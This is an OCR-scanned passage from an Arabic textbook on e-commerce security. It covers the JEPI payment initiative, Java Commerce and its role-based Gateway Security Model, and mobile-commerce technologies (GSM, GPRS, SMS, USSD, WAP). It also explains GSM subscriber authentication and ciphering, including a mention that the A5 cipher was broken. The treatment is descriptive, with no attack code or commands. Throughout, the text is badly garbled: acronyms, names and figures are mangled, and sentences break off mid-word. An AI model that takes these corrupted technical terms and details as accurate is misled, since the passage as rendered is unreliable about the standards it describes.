ثمن) أو خصوصية وصلة تطبيقات باحتياجات أمن يمكن أن يستعمل مثلا . 

تمهيدى الدفع الالكترونى المشترك ) (JEPI‏ 

تمهيدى الدفع الالكترونى المشترك foint Electronic Payments Initiative‏ 
Commerce Net)‏ عبارة عن at‏ تعاونى لشبكة تجارية ۰۷۷36 تتضمن عدد م 
الشركات والتى هی عضو فى تجمع واحد أو أكثر . وهدف JEP]‏ هو تحديد طرية 
عيارية لطرق abo‏ المحادثات وبروتوكولات بين موكلين 5 middleware‏ الدفع والخد 
عبر الشبكة JEPI. (Web)‏ طورا 1 حدد ables‏ انتقاء abo‏ حركى مؤسس على ia)‏ 
Universal Payment preamble ( UPP ¿oo HTTP‏ : تمهيد الدفع الشامل) 
ويستعمل UPP‏ للمحادثات عن جهاز الدفع (مثل شيك » أو بطاقة Olas!‏ أو la‏ 
مدين أو دفع نقدى الكترونى)» والعلامة التجارية (مثل faster Card. Visa‏ 
(American Express »‏ وبروتوكول دفع (مثل (GlobeID « Cyber Cash « Set‏ 
UPP‏ تنفذ كامتداد PEPJ‏ عدد بواسطة URL‏ خاص (http : //w3. org/UPP)‏ 
بناء JEPI‏ ذاته لا يعنون موضوعات أمن . ونظام الدفع المحدد الفاوض بواسطة PP‏ 
مسئول عن التراسل الامن للمعلومة القابلة . 

بروتوكول إمتداد البروتوكول (PEP)‏ عبارة عن إطار عام لوصف الامتداد خلا 
۴۳ فى 3871 ۰ فان PEP‏ يستعمل كبروتوكول ale‏ أغراض عامة والذى ؛ 
يمكن لموكل Web‏ وخادم أن يوافقوا على أى وحدات إمتداد تستعمل » ومتغيران 
المحادثات لتلك الوحدات وسؤال الطرف الآخر » لبدء استعمال إمتداد محادثات . 
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كل امتداد ل PEP‏ يمثل امتداد ل HTTP‏ ومصاحب ب URL‏ . إمتدادم8م 
يستعمل حقول رأس جديدة متعددة لحمل محدد الامتداد والمعلومة ذات الصلة من . 
موکلی Web‏ خلال أوساط » وللخدم والعكس صحيح . وکل نظام دفع فى JEPI‏ 
يعتبر كامتداد PEP‏ حدد بواسطة URL‏ . ومع ذلك e‏ يبدو أن 1881 لم يعد يُدعم : 
ولم يعد (Platform for Internet Content) PLCS Selection‏ پستعمل PEP‏ 
»و SEA‏ (بناء إمتداد أمن ل 1996 HTTP / 1.xa W3C Draft form‏ ۸ ينتشر فى 
الاستعال . مواصفات 1871 هی مذكرة فنية W3C‏ ۰ فقط » لذلك فليس من 
الواضح إذا ما كان W3C‏ سيلاحق العمل على TEPI‏ . 

تجارة 1۸۷۸ : 

تجارة ۵۷۵( (Java Commerce : J C‏ عبارة عن إطار مؤسس على جافا لتطویر 
تطبیقات موسسة عل تجارة إلكترونية عل الانترنیت . حالیاً (نی آبریل2000) > فإن 
جانب الوکل فقط (مثل (JCC: Java Commerce Client‏ هو المتاح . واخاصية 
الوحيدة المشتركة الطلوبة من الخدم (Servers)‏ هی القدرة على إرسال رسائل تجارة 
جافا e OCM)‏ والتی يمكن توليدها بواسطة «applets‏ أو برامج CGI‏ أو Servlets‏ . 
كذلك « فان الخدم يجب تشكيلها لتقبل أجهزة الدفع النتقی وفهم بروتوكولات الدفع 
المقابلة . وتكنولوجيا تجارة 2 تم تقديمها عام 1996 ۰ ولكن لسوء الحظ لم يلاحظ 
تقدم كبير منذ ذلك الحين » لذلك فهى لازالت فى طور التطوير . 

التكنولوجيات الأساسية فى ‚Commercial Java Beans ¿Java Wallet „s JCC‏ 
Java Wellet, Java Beans‏ . عبارة عن مشترك مستخدم للشراء المركزى وتعاملات 
تجارية أخرى «مثل المصرفية المنزلية : (home banking‏ تجعل من الممكن كتابه 
برنامج قطعة برنامج فى Java‏ (قطعة Component‏ عبارة عن وحدة برنامج معاد 
استع الها بمحتوى ذاتى) . على IOC N‏ » تتضمن النظم الفرعية التالية : 

© مشترك المستخدم (a wallet) AL!‏ يستعمل للتعامل البينى مع مستخدم 
(ينتقى ويحرر أجهزة الدفع » ويحرر أفضليات المستخدم » ویستعرض التعامل . 


ICM ©‏ عبارة عن نسق رسالة فيها خدم التجارة تتصل بالوکلین . A JCM‏ 
المرسل بخادم تجارة يطلب بأن يؤدى الموكل عملية (مثل شراء) ويعطى معلومة عن أى 
بروتوكول يمكن استع‌اله (SET ts)‏ والأجهزة (مثل old (Visa Card:‏ العملية . 
وحيث أن بروتوكولات التشغيل والأجهزة كلها مرکبات Java Beans‏ تجارة » فان JCM‏ 
یعطی أيضاً معلومات عن Beans‏ التى تحتاج أن تحمل عبر الشبكة وتركب فى 
JCMcile . Wallet‏ الامتداد gem‏ و MIME‏ نوع- application / x - java‏ 
commerce‏ . 

© الكاسيتات (Cassettes)‏ عبارة عن ملفات (جافا أرشيف) (JAR)‏ موقعة Los)‏ 
وتحتوى على واحدة أو أكثر من مركبات Java Beans‏ التجارية ومواردها . Java‏ 
۸ مصممة للتحمیل آدنی أوتومايكياً وترکیب كاسيتات محددة بواسطة تعامل 
محدد . ویمکن أن تحتوئ applets‏ التجار على مشترکات لکاسیتات محددة . 

© قاعدة البيانات الشفرة ذات الصلة تختزن بأمان معلومات الستخدم (مثل آرقام 
سحجلات الأحداث . 

(Gateway Security Model : GSM) موديل أمن الممر‎ © 

يمد موديل أم Java‏ . فهو يدعم Oly‏ تطبيق متعددة تحتاج تعامل بين تطبيقات 
من بائعين متعددين » وتلك البيئات مؤسسة على ثقة محدودة ; 

ولا تؤسس علاقة أعمال على ثقة مطلقة بين طرفين . آخر موديل أمن Java‏ يمكن 
استع اله لعلاقات ثقة محدودة لعمل موديل بين جزء شفره فقط والخدمات موارد النظام 
التى تنفذ عليها الشفرة .فمثلا » يمكن de!‏ ل applet‏ لقراءة ملف محدد ولکن 
ليس لقراءة وكتابة كل الملفات فى نظام الملفات. مع ذلك » فان هذا الموديل لا يمكنه 
عمل ثقة موديل بين برامج التجارة المختلفة (مثل (beans «applets‏ الورادة من أطراف 
take‏ . فمثلا » تطبيق يعطى تقريراً عن ضريبة قد يكون قادراً أن يصدر معلومات 
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مكاسب كببرة من قاعدة بيانات تطبيق سمسار منزلى . ولكن لن يكون قادراً على قراءة 
ملعومات مستشار سندات تجارية من قاعدة بيانات المستخدم . ولحل هذه UKAN‏ 
فان GSM‏ تعرف آدوار (roles)‏ بحيث أن كل قطعة من البرنامج يحدد لما دور واحد أو 
أكثر . (مثل سمسار منزلى » تقرير ضرائب ومستشار سندات تجارية). ومؤسس 
الأدوار على اتفاقيات عقود بين أطراف بينهم علاقات تجارية . وتنفذ الأدوار بتوقيعات 
رفسف ls‏ ملف JAR‏ يتم توقيعه للدور الذى Commercial Javad, K‏ 
95 الخاص به فى ICC‏ . بذلك » ]15 رغبت سلطة الضرائب أن تكتسب وصول 
لكاسيت الوسيط أو السمسار A‏ سيوقع حينئذ كاسيت السلطة لدور تقرير 
الضريبة» وبذلك يسمح بقراءة أجزاء محدودة فقط لقاعدة بيانات تطبيق السمسار 
امول وبعض NN‏ معرفة فعلا ی ICC‏ وآدوار جديدة یمکن أن تصرف بواسطة 

ule GSM‏ عن doy‏ آمن توجیه / Ge‏ والذی فيه یمکن نقل الحقوق 
(أى Privileges‏ ( من شخص إلى آخر » وکا هو معلوم GSM e‏ مؤسس على مودیل 
القذرات لين فشكل ¿ON‏ 

شکل )1.4( : موذیل القدرة 
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)1( الشفرة )1( حارسس البوابة (البواب) (r)‏ فاحص الاعتماديات (E)‏ القدرة (0)الزمن 
)1( طلب الخدمة باعتماديات (۷) إعتماديات الفحص (A)‏ موضوع قدرة (إذا كان الاعتماد صحيحا ) 
(9) إنشاء موضوع قدرة جديد (إذا كان الاعتمادی صحيح ). 
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وعندما يطلب جزء من الشفرة خدمة والذی يحتاج ها حقوق وصول محددة » 
فيجب أن تسلم إعتمادياتها (Credentials)‏ خارس البوابة (البواب) . والبواب يتحقق 
إذا ما كانت الاعت‌ادیات صحيحة بامرارها لفاحص إعتاديات . وإذا كانت 
الاعت‌ادیات صحيحة » فإن خدمة القدرة تنشىء هدف قدرة جديدة والذى يعود لجزء 
الشفرة بواسطة البواب . 

¿GSM d‏ فان هدف قدرة العائد بواسطة Cate) dlp‏ ۵ ) هو هدف Java‏ يسمى 
Permit‏ شكل (YA)‏ يبين سريان تحكم أمن مبسط ف 65M‏ . التذكرة Role a‏ 
Token‏ (أى اعت‌ادیة) والتی ترر للبوابة بواسطة Bean‏ وقد تستعمل مرة واحدة فقط . 
وکا سبق وذكر » فإن الدور (Role)‏ يمثل توقيع رقمى ويستعمل ليبرهن صحة تذكرة 
(Ticket)‏ . البوابة تمثل طريقة توثيق» ففى هذه الحالة مؤسسة على التحقق من توقيع 
رقمى . البوابة تمرر التذاكر لمدير الدور » والذى يتحقق من التوقيع ويحاول إيجاد المفتاح 
العام المقابل فى جدول أشخاص والذى يمكن تسليمه لحقوق الوصول المطلوبة . 
التذكرة صحيحة إذا كان الموقع حدد له دور يمكن تحقيقه بمفتاح عام مقابل » إذا 
lei‏ أنفءت ¿Mila‏ تحاول أن تحصل على سماح له . وإذا كانت 
التذكرة صحيحة » فان مدير الدور (Role Manager)‏ يختمها ويعيدها للبوابة . هذه 
الطريقة » الست ا دص ee‏ » ومن 
المحتمل لاغراض زائفة . والبوابة تنشىء هدف سماح والذى يمرر خبائياً لل Bean‏ 

فمثلا > الكاسيت الذى يحتوى على Opertion Beam‏ يجب أن يوقع لدور 
التشغيل (Operation Role)‏ . ودور التشغیل يساعد Operation Beam‏ للحصول 
على تصريح تشغيل (Operation Permit)‏ من بوابة تشغيل (Operation Gate)‏ . 
أو » لاضافة بند لحذب القائمة لأسفل فى Wallet GUI‏ < فان كاسيت Operations‏ 
Us Beam‏ أن يوقع لدول القائمة دور القائمة (Menu role)‏ یسمح Operation]‏ 


et ol Bean‏ على تصريح 1.58 (Menu Permit Menu Gate)‏ من بوابة 
القائمة. 
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شكل (۲۰۸) : موديل أمن المر 
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(if signature valid) 
البوابة )1( مدير الدور‎ )( 
الزمن‎ )٤( السماح‎ (1) 


)0( دور (التذكرة) (5) فحص التوقيع على دور التذكرة 
(۷) تذكرة ختم (دور) [ إذا كان التوقيع صحيحا [ 
(A)‏ دور (سماح) [ إذا كان التوقيع صحيحا ] . 
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Security 


Mobile Security : 

أمن المحمول ۱ 

فى هذا الباب سنتعامل مع المواضيع الامنية لتكنولوجيا الحمول . التجارة المحمولة 
(mobile commerce)‏ والبطاقات الذكية Sub los (smart cards)‏ فى حياتنا 
اليومية » ولكن وكلاء المحمول لازالوا فى طور الخبرة . 

أمن التجارة المجمولة: 

مقدمة الأدوات المحمولة » مثل التليفونات المحمولة PADs sl (mobile phones)‏ 
أحضرت آنواع جديدة لطرفيات المستخدم الانتهائى والتى انتشرت أكثر من الحاسبات 
الآلية الشخصية (POS)‏ لذلك كانت خطوة WE‏ منطقية ihle‏ دعم الأدوات 
المحمولة لتعمل كأداة للتجارة الالكترونية . وببساطة ربطها بالانترنيت» فإن ذلك 
ليس كافياً . موكلو المتنقل لازالوا قليلين (أى أن لهم ذاكرة محدودة وموارد حسابية ‏ 
بين النموذج الوجود لخدمات الانترنيت الشبكة العالمية (www)‏ كانت مصممة 
مطلوب إختراعه . لذلك ۰ فان النموذج القديم قائم أساساً للشبكة SS‏ 
المحمولة. ويوجد عديد من الخدمات الشخصية الحديدة والأكثر قوة مجهزة Lanas‏ 
asta ade dal‏ 

. هذا الباب نعطى عرضاً للتكنولوجيات التجارة المحمولة‎ dy 


مومه 


مدیم 
التجارة الحمولة (m - commerce)‏ هی تجارة الکترونية حيث یصل العملاء 
للشبكة باستع‌ال آداة محمولة مثل التلیفون «Sparel!‏ أو متصل (Communictor)‏ 


\\o 


[مساعد رقمى شخص متكامل أو ملحق بتليفون محمول ] أو تليفون ذكى (نوع جديد 
لطرفی محمول مع عرض أكبر » غالبا لوحة مفاتيح QWERTY‏ أو وسادة مفاتيح 
حساسة باللمس أو برنامج داخلى متخصص متصل بخدمة محددة وتطبيق يجعل 
الستخدمین يصلون لبريد الكترونى» وفاكس وانترنيت الشركة) . وتعبير A‏ یستعمل 
بكثرة للتجارة المحمولة هو التجارة الالكترونية اللاسلكية wireless e - Com-)‏ 
6 . والاداة المحمولة تسمى لاسلکی لأن وسيط التراسل فيها هو قناة راديو أو 
مشترك هواء (air inter face)‏ . المستهلكون هم مجموعة الهدف الأساسية لتطبيق 
التجارة المحمولة (مثل الاعلان المحمول والأعمال البنكية المحمولة والسمسرة المحمولة» 
والتسويق المحمول بدفع محمول أو نقد محمول والتسلية المحمولة » ولكن توجد 
تطبيقات متوجهة SLE‏ (مثل تكامل سلسلة الانتاج» والتحكم من بعد » وانجاز 
وظيفة). خدمات التجارة المحمولة ستكون شخصية بتزايد » OY‏ الاداة المحمولة 
تستعمل بواسطة شخص مدد والذی يمكن وجوده طبيعياً وبالتالى تقدم له الخدمة 
مباشرة (مثل > الفندق يقدم إيواء عند وصول شخص عند مطار محدد . 

عرض تكنولوجى : 

الشبكة التى تربط الادوات المحمولة مثل التليفونات المحمولة هی شبكة التليفونات 
المحمولة (mobile telephone network)‏ 3 أوريا ومعظم منطقة الباسيفيكى 
الأسيوية » فإن الشبكة مؤسسة على البروتوكولات Ball‏ بمعايير (النظام العالمى 
للاتصالات المحمولة : «(Global System for Mobile Communications)‏ وتم 
معايرته بواسطة المعهد الأوربى لعاير الاتصالات TIA/EIA - 136.(ETSD‏ 
IS - 6 Lala)‏ والتى تم تبينها حديثاً كمعيار الأهلى TDMA ANSI -( Su A‏ 
tal os (136‏ فى كندا وأمريكا الجنوبية واسرائيل . 136 - 11۸/۴1۸ مدعم 
باتحاد الاتصالات الدولى e‏ ومثل GSM‏ مؤسس على TDMA‏ (وصول متضاعف 
بالتقسيم الزمنى : (Time Division Multiple Access‏ . وبناء على آخر إصدار 
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لمذكرة فهم الموقعة فى أكتوبر 1999« فان |تحاد05(/6 ۲71۷700۰ كونا تعاو نحو العمل 
البينى 3601 النتشر عالمياً بين TDMA ANSI - 136 « GSM‏ . العمل البينى سينتج 
باستعال طبقة طبيعية مشتركة (EDGE)‏ . 

TIA/EIA - 136 ¿GSM‏ هی تكنولوجيات توصیل دوائر ومنخفضة نسبياً (حتى 

High Speed - cir-) بیانات الدوائر الموصلة ذات السرعة العالية‎ . (14.4kbps 
هی خاصية حدث تسمح‎ (GSM 02.34 «HSCSD) (cuit Switched Data 
CSD . (115 skbps 56(نظريا‎ Kbps > للمستخدمين باكتساب ناتج كلى أكبر‎ 
ويحتاج لربط عن طريق‎ WAP تستعمل فى معظم خدمات المحاولات المؤسسة على‎ 
dale إحتياج‎ dey طلب القرص للتهيئة من 10إلى 30 ثانية . لخدمات البيانات » لا‎ 
Packet switch-) لربط دائرة دائم « لذلك فإنه أكثر كفاءة استعمال توصيل القوالب‎ 
حيث أنه يستعمل موارد الشبكة عندما توجد بيانات لارسالها فقط : خدمة رادیو‎ (ing 
تضيف وسيلة توصيل‎ (General Packet Radio Service : GPRS) القوالب العامة‎ 
وبذلك تجعل العمل البينى بين‎ TIA/EIA - 136: قوالب إلى شبکات](05‎ 
يمكن رؤيتها كشبكة‎ GPRS الانترنيت وشبكات التليفونات المحمولة مکن . شبكة‎ 
. مضيفات محمول‎ EE والتی‎ GPRS مساعدة للانترنيت الأدوات المحمولة المدعمة ب‎ 
ولکن الحقيقية فى‎ ۰ 172 Kbps القصوى » نظرياً هى‎ GPRS سرعة الارسال البيانات‎ 
تكافء وظيفية‎ GPRS (كيلو رقم ثنائى فى الثانية . وظيفية آمن‎ 50 Kbps حدود‎ 
فقد‎ » [lo هى أن المشتركين مركزيين‎ GPRS مشكلة واحدة ترجع‎ . GS Mol 
يستقبلون محتوى غير مطلوب ( أو بالى ) . مصادر الانترنيت الصادر منها تلك‎ 
المحتويات لا يمكن شحنها . فى سيناريو أسواً الحالات » فإن مشترکی المحمول ذاتهم‎ 
وغذا السبب » فان بائعى المحمول من المحتمل ألا‎ . Junk) سیدفعون المحتوى إلى‎ 
يدعموا نقل بيانات انتهائية من المحمول (بيانات تنقل إلى بالمقارنة لمن أدوات محمولة)‎ 
بدأت من متصفح دقیق قد تكون الطريقة الوحيدة‎ WAP ودورة‎ . GPRS فى طرفيات‎ 
. لاستقبال معلومات على طرفياتهم‎ GPRS SAA 


۱۱۷ 


a) EDGE‏ البیانات الدعمة ol WE ( GSM dowd‏ عيارية 
بواسطة UWCC ¿ETSI‏ تضع مشروع تعديل جديد للسیاح للسرعات الناتجة 
الكلية للبيانات حتی Kbps‏ 384 باستعمال البئية الأساسية الموجودة ل gl) GSM‏ أنه 
يزيد سعة القناة بدون زيادة عرض الحزمة). 0885© مع EDGE‏ على مسار 
GPRS JEN)‏ لنظام الاتصالات العالی المحمول (Universal Mobile Tele-)‏ 


communications System :UMT 


جيل أوربى ثالث «30) معيار محمول المفترض أن يحل محل GSMi‏ لدعم كلا 
الصوت وخدمات البيانات وسيقدم أداء فى تعبيرات معدلات بيانات JÁ‏ «مثل: 
للراجلين بمحمول Kbps‏ 384) . 

خدمة الرسالة القصيرة (short message service : SMS)‏ وهی جزء من معيار 
GSM‏ وتدعم إرسال واستقبال رسائل نصوص من وإل تليفونات محمولة على أساس 
اختزن ‏ و للامام (store - and - forward)‏ . رسالة SMS‏ قصيرة جدا » حتى 160 
رمز للحروف اللاتينية » أو 70 رمز (حرف) للحروف الغير لاتينية . ويمكن للعميل أن 
يستقبل رسائل من تلیفونات حمولة أخرى أو من الانترنيت عن طريق عرات SMS‏ 
لرسائل البريد الالكترونى SM‏ المرسلة من الانترنيت » عميل المحمول قد يتسلم 
ملاحظة وبداية الرسالة . SMS‏ يمكن أن تستعمل لتقديم معلومات مثل الرياضة أو 
الحسابات أو جداول الطيران . وبیتا SMS‏ عبارة عن خدمة واحد - إل - واحد أو 
واحد ‏ إلى - قليل » فان إذاعة الخلية (GSM 03.49) (Cell Broadcast)‏ ستضيف 
إمكانية إرسال رسالة إلى عملاء تليفون محمول متعددين متواجدين خلال جزء من 
منطقة تغطية الشبكة فى وقت إذاعة الرسالة . 

وبخلاف SMS‏ « فان USSD‏ ( بيانات خصدمة تكملة غير مهيكلة 
(Unstructured Supplementary Services Data). GSM 02.90 and 03.90)‏ 
ليست إختزان ‏ و للأمام ولكن خدمة توجيه دوره . وعندما يصل مستخدم لخدمة 
USSD‏ « تيا دوره وتظل وصلة الراديو مفتوحة حتى يتحرر من المستخدم أو التطبيق - 


۱۱۸ 


أو إنتهاء الوقت . وقد قدر أن USSD‏ يمكن أن يصل سبعة مرات فى السرعة SMSI‏ 
خاصة USMS SY‏ فوقى Je‏ حتی للتعاملات الأنسط . 

حاليًا » توجد منتديات متعددة بخصوص التجارة المحمولة (m-commerce)‏ « 
مثل منتدى Radicchio ۰ WAP Forum‏ منتدی WAP‏ عبارة عن اتحاد صناعة 
ان عام ۱۹۹۲ بواسطة موتورولا » ونوكيا وإريكسون » ua) . Phone.com‏ 
الأساسى ل WAP‏ هو إحضار معلومات وخدمات من الانترنیت لادوات محمولة 
بطريقة مستقلة لتکنولوجیا الشبكة Radicchio.‏ والتی أعضاؤها Ble‏ عن شرکات 
متعددة وهيئات » مهتمين فى المقام الأول بتطویر تجارة محمولة آمنة وتعزیز البنية التحتية 
للمفتاح العام للأدوات اللاسلكية والشبكات . وقد أسست Raddichio‏ عام ۱۹۹۹ 
بواسطة EDS ¿Gemplus » Sonera‏ . والبنية التحتية للمفتاح العام عبارة عن مطلب 
ضرورى لتنفيذ خدمات دفع المحمول . 

مواضيع الأمن فى تطبيقات التجارة المحمولة لا تختلف عن تلك التى لتطبيقات 
التجارة الالكترونية الأخرى وقد سبق باختصار شرح مفهوم أمن GSM‏ ( أى أمن طبقة 
الشبكة المحمولة ) . وف الجزء التالى سنلقى نظرة على مواضيع أمن WAP‏ 
SIM Application . Toolkit‏ تكون أطول من WAP‏ » ولكن 2.0 WAP‏ ستتضمن 
ومن المحتمل بعد ذلك أن تسبقها . آخیرا » وسنقدم فى جزء MEXE JU‏ وهو Al‏ 
تطور تکنولوجی فی مجال تطبیق التجارة الحمولة . 
آمن GSM‏ : 

الشبكات المحمولة تسمى We‏ خلوية LY (Cellular)‏ تستعمل (BS) olhe‏ 
لتغطية منطقة جغرافية محددة ( بواسطة إشارة راديو ) تسمى خلية (Cell)‏ شكل 
(-۱). 855 متعددة محكومة بواسطة متحكم dae‏ قاعدة BSC . (BSC)‏ متعددة 
بالمقابل محکومة Sole‏ بواسطة مركز نقل توصيل محمول (MSC)‏ . 
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شكل )1.9( موديل شبكة GSM‏ مبسط 


PSTN 





BS: Base Station VLR: Visitor Location Register 1 
BSC: Base Station Controller AUC: Authentication Center y 
MS: Mobile Station EIR: Equipment Identity Register A 


GMSC: Gateway Mobile Services Switching Center HLR: Home Location Register q 
PSTN: Public Switched Telephone Netwark 


o mt — 


. محطة قاعدة. () متحكم محطة القاعدة. (۲) محطة محمولة . )£( مركز نقل توصيل خدمات‎ )١( 
. شبكة التليفونات نقل التوصيل العامة . )1( مسجل موقع الزائر‎ (0) 
. مركز التوثيق . (4) مسجل تحديد المعدة . )4( مسجل موقع النزل‎ (Y) 

مر MSC‏ هو المشترك بين شبكة المحمول والشبكات الأحرى ( أى شبكة التليفونات 
نقل التوصيل العامة (PSTN‏ . واحد من الصعوبات الأساسية للشبكات المحمولة 
بالمقارنة مع PSTNS‏ هو حقيقة أن حطات المحمول MS)‏ » مثل التليفونات المحمولة ) 
ليس لها ربط دائم لشبكة المحمول . هذا السبب » يجب على الشبكة أن تتعقب موقع 
المشترك الحمول e‏ والذی يشار ad]‏ حدیث الوقع (location update)‏ . عندما توصل 
5 آو تتحرك من منطقة محكومة بواسطة BSC‏ ( منطقة موقع LA‏ لأحرى » فان MS‏ 
las‏ إجراء تحدید موقع . وهذا Ll‏ یعنی أن MS‏ تستقبل محدد LA‏ جدید (LAT)‏ 
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منطقة الموقع الحالية . الأجزاء الأخرى تسمى استدعاء (Paging)‏ يستعمل لتحديد 
الخلية المضبوطة التى عليها يوجد MS‏ . الاستدعاء يتضمن إرسال رسائل محددة لكل 
الخلايا ل 14 . لذلك » للمكالمات الواردة فان MSC‏ ترسل رسالة إستدعاء (Paging)‏ 
لكل 855 ل 14 التى فيها ما یسمی MS‏ مسجل . إذا أجاب «MS‏ فان MSC‏ تربط 
المشترك الطالب بالمشترك المطلوب . 

وكل مشترك frat GSM‏ على محدد متعدد يسمى IMSI‏ أى رقم الأهلى للمشترك 
الأعل (international mobile number)‏ » . ورقم التليفون » ومفتاح توثيق الشترك 
K‏ . هذه البيانات تختزن بصفة مستديمة فى مسجل موقع البیت (home location‏ 
registere : HLR)‏ ل MSC‏ القابل MSC)‏ البيت) . MS‏ ليس بالضرورة خلال 
المنطقة الإدارية MS‏ البيت . وعندما يتحرك لمنطقة MSC‏ أخرى » فان البيانات الخاصة 
ل MS‏ تختزن ge‏ فى مسجل موقع الزائر MSCI(VLR)‏ الحالية . VLR‏ حصل على 
بيانات MS‏ من MSC‏ البيت . ودور مركز التوثيق (AUC)‏ سيتم شرحه . 

: يعرف خدمات أمن الشبكة التالية » والمشروحة باختصار فى الجزء التالى‎ GSM 
A شخصية کینونه‎ © 
. توثیق کينونة الشترك‎ @ 

a 
. تحديدة معدة المحمول‎ © 

خدمات الأمن الثلاثة الأولى سيتم شرحها . 

خطوات الحل (AS AS (A3) (Algorithms)‏ سرية » Shel‏ » ولكن شفرة 
الصدر (source code)‏ متاحة الآن . خطوات حل البيانات الخاصة » لمشترك والأمن 
مختزنة فى وحدة كينونة المشترك SIM . (SIM)‏ يمكن تنفيذها فى شكلين إما كبطاقة ذكية 
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أو SIM‏ بالفيشة بذلك ¢ تم عمل فرق بين العدة الحمولة she) ME‏ تلیفون محمول 
بدون SIM‏ » وحطة محمول MS‏ (: معدة محمول مع (SIM‏ . 

ومن الواضح > أن مشترکین مختلفين قد یستعملون نفس ME‏ إذا آدخلرا SIMs‏ 
الخاصة بهم . وللتأكد أنه d‏ يستعمل ME‏ مسروق أو غير موثق فى النظام » فإن مركز 
التوثيق ( يرجع إلى (HLR‏ يفحص قائمة كينونات معدة دولية محمولة (MED‏ على كل 
عمل . 

توجد مشكلة أمن معروفة قليلاً مربوطة بمحطة محمول : ومن المکن GS‏ استعمال 
MS‏ للتنصت ( مثل بقة ) حتى إذا قطع التوصيل » فيمكن توصيله عبر ال هواء » لذلك 
فإن أفضل حماية هى إخراج البطارية . 
خصوصية هوية المشترك : 

حتى نحمى هوية المشترك بالنسبة للمتنصتين على قناة الراديو » فان 110151 لا ترسل 
فى الوضوح بتانًا عبر مشترك الهواء . ولا يوجد استثناء هذه القاعدة ( فى الحقيقة» فجوة 
آمن ) . وإذا حدث تحديث لموقع فى VER‏ جديد و ۷1/8 السابق لا يتم الوصول إليه › 
فان VER‏ الجديد يسأل MS‏ بأن يرسل IMSI‏ الخاص به فى الوضوح . وفى كل الحالات 
الأخرى » فبدءًا من IMSI‏ ۰ يستعمل إسم مستعار (alias)‏ مؤقت : تطابق المشترك 
المحمول المؤقت (11151) وعند عمل ربط » MS ob‏ يرسل TMSI‏ الستعمل سابقا إلى 
MSC/VLR‏ ويستقبل بالقابل TMSI‏ جديد» والذى يرسل فى رسالة مشفرة بحيث لا 
يمكن قراءته بواسطة المتنصتين . حساب المفتاح المشفر (KC)‏ سنشرحه فى الجزء 
التالى: 
توثيق هوية المشترك : 

وعندما يريد MS‏ عمل مكالمة » فإنه يطلب آولا قناة خالية من ال 85 . وعند 
تخصيص القناة » فان MS‏ يطلب تحديث موقع . هذا الطلب يمرر عبر ©85 إلى 
MSC‏ الآن » MSC‏ يطلب ال MS‏ لتوثيق نفسه . إجراء التوثيق هو آلية تحدى / 
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إستجابة شكل (۲-۹) . وکا سبق ذكره » فان كل مشترك يحدد له مفتاح تحديد مشترك 
(ki)‏ والذى يختزن فى HLR‏ » أو أكثر تحديدًا فى AUC‏ ذو الصلة ب AUC .HLR‏ هو 
الكينونة الوحيدة فى الشبكة التی تعرف ki‏ » لذلك يجب الوثوق به بواسطة المشترك e‏ 
كذلك فإن [16 ختزن Lal‏ على بطاقة SIM‏ فى SM‏ مع MSI‏ وخطوات حل توثيق A3‏ 
لتوثيق MS‏ » فان كينونة التوثيق ( مثل (MSR/VLR‏ ترسل رقم عشوائى RAND‏ 
ال MS. MS‏ يصنع خطوات حل توثيق ۸3 لحساب استجا ستجابة موقعه بطول 32 رقم 
ثبائى . SRES‏ والمؤسسة eis K « RAND ۰ IMST Jo‏ . وحيث أن HLR‏ 
فقط يعرف ki‏ » فان VLR‏ يمكنه فقط الحصول على متجه (vector)‏ 335 من ALR‏ 
(أو ۷1 السابق) . ويحتوى التجه على الازه واج (RAND « SRES)‏ بحيث أن VLR‏ 
قد يفحص إذا ما كان MS‏ يرسل الاستجابة الصحيحة لتحدى محدد. الاختيار 
الحقيقى لخطوات حل التوثيق هو مسئولية عمال أو عمال شبكة GSM‏ منفصلة e‏ 
ولكنهم يعملون بقرب مع بعضهم لتأكيد أمن التوثيق . 
شكل )1.9( توثيق مشترك GSM‏ 





AUC/HLR MSC/VLR MS, 
RAND, | SRES, RAND | SRES, | (y) ١ 
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IMSI 
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Response : 
: SRES 


‘Auth Auth 
Reject DK 


(ا)تحدى. (؟)إستجابة. 2 ()نعم. ()لا. (6) توثيق مرفوض N)‏ 
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وحيث أن 12/151 هو محدد مؤقت فقط » فان هوية التوثيق ( أى (MSC/VLR‏ 
تحتاج للحصول على IMSI‏ أيضًا » من 11۸ أو من VER‏ السابق . وهذا فى الواقع 
يعنى أن HLR‏ فقط يجب أن يتجنب تسرب أى معلومة عن المشترك خلال قيمة IMSI‏ 
ولكن LAIVLR‏ . والا » فان خصوصية كينونة المشترك لا يمكن lo‏ . بالإضافة 
لذلك ۰ يجب أن يتم الوثوق فى 1111 أا لا تسىء إستعمال IMST‏ (مثل» توليد 
مكالمات مزيفة ) . 
خصوصية البيانات والربط : 

كذلك AUCO:‏ يحسب مفتاح التشفير (cyphering)‏ لكل مشترك foo.‏ هذا 
الحساب يحتوى على IMSI‏ ۰ ومفتاح توثيق المشترك ki‏ » ونفس الرقم العشوائى 
LS RAND‏ هو للحساب لتجه التوثيق المقابل dy.‏ هذه الحالة » تستعمل خطوات 
حل مختلفة cl)‏ خطوات حل تشفير (AB‏ والذى يتخلى عن مفتاح التشفير Ke‏ )64 
رقم ثنائى) متجه مفاتيح التشفير يرسل مع متجه توثيق إلى VLRIMSC‏ ويختزن أيضًا 
على بطاقة SIM‏ . لتشفير البيانات / الحديث الفعلى » فإن خطوات حل 5ه يطبق . 
التشفير يتم بواسطة المعدة المحمولة » GY‏ بطاقة SIM‏ ليس ها قدرة معالحة كافية 
للتشفير فى وقت حقيقى . الخيارات البديلة طورت ل 5ه التى سمحت بانتشار 
التكنولوجيا بالرغم من نظم التصدير . وکا هو معلوم » يجب الوثوق فى VLR‏ لانه 
يعلم مفتاح التشفير ويمكنه قراءة كل البيانات التى ترسل من و إلى المشترك . 

ونوع د هتم حله بنجاح بواسطة Biryukov‏ و Shamit‏ . وال يمكنه استخراج 
مفتاح التشفیر فى أقل من ثانية على حاسب آلى شخصی (PC)‏ واحد على أساس الخرج 
الناتج بواسطة 5/1ه فى الدقیقتین الأولتين . 
بروتوكول تطبيق اللاسلكى : WAP‏ 

بروتوكول تطبيق اللاسلكى (Wireless Application Protocol)‏ عبارة عن l‏ 
عام لمتوالية من المواصفات المفتوحة أصدرها منتدى jas "WAP"‏ بروتوكولات شبكة › 


1 


إطار تطبيق وشبكة لأدوات ASIN‏ معظم خدمات WAP‏ تتراوح بين ملاحظات 
رسالة وأداة مكالمة » وبريد إلكترونى وخدمة تليفونية مضافة لتعاملات تجارة الكترونية 
